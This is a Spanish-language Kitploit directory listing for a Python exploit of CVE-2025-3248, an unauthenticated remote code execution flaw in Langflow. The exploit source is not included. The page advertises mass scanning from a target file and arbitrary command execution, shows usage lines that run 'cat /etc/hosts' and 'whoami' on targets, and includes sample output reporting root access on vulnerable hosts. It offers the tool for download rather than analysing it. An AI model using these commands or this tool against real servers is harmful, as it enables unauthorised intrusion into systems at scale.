Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-3248 — Exploit basado en Python para CVE-2025-3248 que permite la ejecución remota de código en instancias vulnerables de Langflow. Soporta escaneo de una sola URL y escaneo masivo con detección automática de vulnerabilidades y ejecución de comandos. | Kitploit
Herramientas/GitHubGitHub/imbas007/cve-2025-3248
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubimbas007/cve-2025-3248

CVE-2025-3248

Exploit basado en Python para CVE-2025-3248 que permite la ejecución remota de código en instancias vulnerables de Langflow. Soporta escaneo de una sola URL y escaneo masivo con detección automática de vulnerabilidades y ejecución de comandos.

Ver Repositorio
2hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de Langflow CVE-2025-3248

Un exploit basado en Python para CVE-2025-3248, que permite a atacantes remotos no autenticados ejecutar código arbitrario en instancias vulnerables de Langflow mediante solicitudes HTTP manipuladas.

Características

  • Escaneo de URL única o masivo desde archivo
  • Detección automática de vulnerabilidades
  • Capacidad de ejecución de comandos
  • Salida detallada con información de tiempo
  • Resultados guardados en archivos separados para objetivos vulnerables y no vulnerables
  • Estadísticas de referencia para el rendimiento del escaneo

Uso

Escaneo de URL única

root@kitploit:~
python CVE-2025-3248.py http://target-url -c "cat /etc/hosts"

Escaneo masivo desde archivo

root@kitploit:~
python CVE-2025-3248.py -f targets.txt

Ejecución de comandos personalizados

root@kitploit:~
python CVE-2025-3248.py -f targets.txt -c "whoami"

Ejemplo de salida

root@kitploit:~
[*] Progress: 1/10 URLs checked
[*] Checking https://example.com
[+] Vulnerable - Command Output:
uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------

[*] Scan Summary:
[+] Total URLs checked: 10
[+] Vulnerable URLs: 3
[+] Not Vulnerable URLs: 7
[*] Total scan time: 25.34s
[*] Results saved to files with timestamp

fuente: https://github.com/verylazytech

Descargar herramienta